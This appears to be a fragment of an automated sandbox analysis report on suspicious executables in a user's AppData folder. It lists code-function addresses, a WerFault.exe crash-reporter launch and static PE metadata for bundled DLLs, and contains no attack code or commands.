Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACEE9805_2_00007FF7AACEE980
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACC89305_2_00007FF7AACC8930
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACB4A285_2_00007FF7AACB4A28
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACE6A485_2_00007FF7AACE6A48
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACE8F1C5_2_00007FF7AACE8F1C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACE81085_2_00007FF7AACE8108
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACB40605_2_00007FF7AACB4060
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACD907C5_2_00007FF7AACD907C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACDC0445_2_00007FF7AACDC044
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACCFDF45_2_00007FF7AACCFDF4
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACDBDF05_2_00007FF7AACDBDF0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACBED545_2_00007FF7AACBED54
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACD0EA45_2_00007FF7AACD0EA4
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACCEE645_2_00007FF7AACCEE64
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACD4E345_2_00007FF7AACD4E34
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACB4E4C5_2_00007FF7AACB4E4C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACE0E385_2_00007FF7AACE0E38
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACF84005_2_00007FF7AACF8400
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACE936C5_2_00007FF7AACE936C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACBF3945_2_00007FF7AACBF394
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACCE3505_2_00007FF7AACCE350
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AAD024F05_2_00007FF7AAD024F0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACBE5045_2_00007FF7AACBE504
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACD84C45_2_00007FF7AACD84C4
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AAD054185_2_00007FF7AAD05418
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACB21C45_2_00007FF7AACB21C4
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACEE1685_2_00007FF7AACEE168
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACF81845_2_00007FF7AACF8184
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACB72F85_2_00007FF7AACB72F8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACF02FC5_2_00007FF7AACF02FC
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACD72505_2_00007FF7AACD7250
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACE97DC5_2_00007FF7AACE97DC
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACDB8145_2_00007FF7AACDB814
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACC17585_2_00007FF7AACC1758
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACB77305_2_00007FF7AACB7730
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACFB60C5_2_00007FF7AACFB60C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACC95545_2_00007FF7AACC9554
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACD06845_2_00007FF7AACD0684
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACFF6445_2_00007FF7AACFF644
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FF71E742EE07_2_00007FF71E742EE0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FF71E742A107_2_00007FF71E742A10
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D13A07_2_00007FFD936D13A0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DB3807_2_00007FFD936DB380
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F33E07_2_00007FFD936F33E0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936FF2C07_2_00007FFD936FF2C0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937143307_2_00007FFD93714330
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937153507_2_00007FFD93715350
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937163507_2_00007FFD93716350
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D72607_2_00007FFD936D7260
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DC2F07_2_00007FFD936DC2F0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DA1B07_2_00007FFD936DA1B0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DC1A07_2_00007FFD936DC1A0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937011607_2_00007FFD93701160
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DD2107_2_00007FFD936DD210
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937030A07_2_00007FFD937030A0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DB1507_2_00007FFD936DB150
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DB7907_2_00007FFD936DB790
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937548407_2_00007FFD93754840
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F68207_2_00007FFD936F6820
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DE8207_2_00007FFD936DE820
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F87F07_2_00007FFD936F87F0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DB6A07_2_00007FFD936DB6A0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D17307_2_00007FFD936D1730
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DD7007_2_00007FFD936DD700
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DD5C07_2_00007FFD936DD5C0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DB5C07_2_00007FFD936DB5C0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F35807_2_00007FFD936F3580
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937806407_2_00007FFD93780640
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937135607_2_00007FFD93713560
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936FC6507_2_00007FFD936FC650
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F24D07_2_00007FFD936F24D0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DE4C07_2_00007FFD936DE4C0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DB4607_2_00007FFD936DB460
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DA5207_2_00007FFD936DA520
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937144D07_2_00007FFD937144D0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD9371CBE07_2_00007FFD9371CBE0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D3B877_2_00007FFD936D3B87
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93712B607_2_00007FFD93712B60
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93732B807_2_00007FFD93732B80
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D1C307_2_00007FFD936D1C30
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93703C007_2_00007FFD93703C00
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F2BF07_2_00007FFD936F2BF0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93715B007_2_00007FFD93715B00
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DBA707_2_00007FFD936DBA70
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93702B407_2_00007FFD93702B40
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD9377DAA07_2_00007FFD9377DAA0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D99C07_2_00007FFD936D99C0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937009B07_2_00007FFD937009B0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DD9B07_2_00007FFD936DD9B0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DE9A07_2_00007FFD936DE9A0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D19907_2_00007FFD936D1990
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F59807_2_00007FFD936F5980
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D9A507_2_00007FFD936D9A50
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DB8D07_2_00007FFD936DB8D0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DD8D07_2_00007FFD936DD8D0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937028B07_2_00007FFD937028B0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937049207_2_00007FFD93704920
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DD0307_2_00007FFD936DD030
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DB0307_2_00007FFD936DB030
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D6E707_2_00007FFD936D6E70
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F2F207_2_00007FFD936F2F20
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DDEF07_2_00007FFD936DDEF0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93711E107_2_00007FFD93711E10
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93702D907_2_00007FFD93702D90
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DBE207_2_00007FFD936DBE20
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936EFDF07_2_00007FFD936EFDF0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F4C807_2_00007FFD936F4C80
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D9D507_2_00007FFD936D9D50
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F2D207_2_00007FFD936F2D20
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93712CC07_2_00007FFD93712CC0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DCCE07_2_00007FFD936DCCE0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378A4307_2_00007FFDA378A430
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378A7207_2_00007FFDA378A720
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378B8D07_2_00007FFDA378B8D0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378C6E07_2_00007FFDA378C6E0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA37890E07_2_00007FFDA37890E0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA37857307_2_00007FFDA3785730
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3785FA07_2_00007FFDA3785FA0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA382A8287_2_00007FFDA382A828
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA381E7CC7_2_00007FFDA381E7CC
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378647B7_2_00007FFDA378647B
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA382E4887_2_00007FFDA382E488
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38369FC7_2_00007FFDA38369FC
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA382E91C7_2_00007FFDA382E91C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378B0007_2_00007FFDA378B000
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA382EF9C7_2_00007FFDA382EF9C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3826DC07_2_00007FFDA3826DC0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA381ECD87_2_00007FFDA381ECD8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38273047_2_00007FFDA3827304
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA382330C7_2_00007FFDA382330C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA383B2907_2_00007FFDA383B290
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378B06A7_2_00007FFDA378B06A
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38237147_2_00007FFDA3823714
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38336A47_2_00007FFDA38336A4
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38235107_2_00007FFDA3823510
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3837BFC7_2_00007FFDA3837BFC
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA383B92C7_2_00007FFDA383B92C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3823D587_2_00007FFDA3823D58
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38242647_2_00007FFDA3824264
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38345D47_2_00007FFDA38345D4
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3820C107_2_00007FFDA3820C10
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA382CB747_2_00007FFDA382CB74
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3788B807_2_00007FFDA3788B80
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA382C8F87_2_00007FFDA382C8F8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3828E987_2_00007FFDA3828E98
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3830E007_2_00007FFDA3830E00
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3788D807_2_00007FFDA3788D80
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38212007_2_00007FFDA3821200
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38397F87_2_00007FFDA38397F8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDAC0F8DB07_2_00007FFDAC0F8DB0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDAC0F68B07_2_00007FFDAC0F68B0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDAC103AA77_2_00007FFDAC103AA7
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDAC104B4A7_2_00007FFDAC104B4A
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C0782011_2_00C07820
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C0C03111_2_00C0C031
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C0817411_2_00C08174
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C032F011_2_00C032F0
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C193ED11_2_00C193ED
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C0D3B011_2_00C0D3B0
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C145D811_2_00C145D8
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C0559011_2_00C05590
Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00C086B0 appears 33 times
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: String function: 00007FFDA3781740 appears 139 times
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: String function: 00007FFD936F56C0 appears 288 times
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: String function: 00007FF7AACBE42C appears 41 times
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1836 -s 256
Source: avformat-60.dll.2.drStatic PE information: Number of sections : 12 > 10
Source: avutil-58.dll.2.drStatic PE information: Number of sections : 12 > 10
Source: swscale-7.dll.2.drStatic PE information: Number of sections : 12 > 10
Source: zlib.dll.2.drStatic PE information: Number of sections : 12 > 10
Source: avcodec-60.dll.2.drStatic PE information: Number of sections : 13 > 10
Source: swresample-4.dll.2.drStatic PE information: Number of sections : 12 > 10
Source: api-ms-win-crt-convert-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-2-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
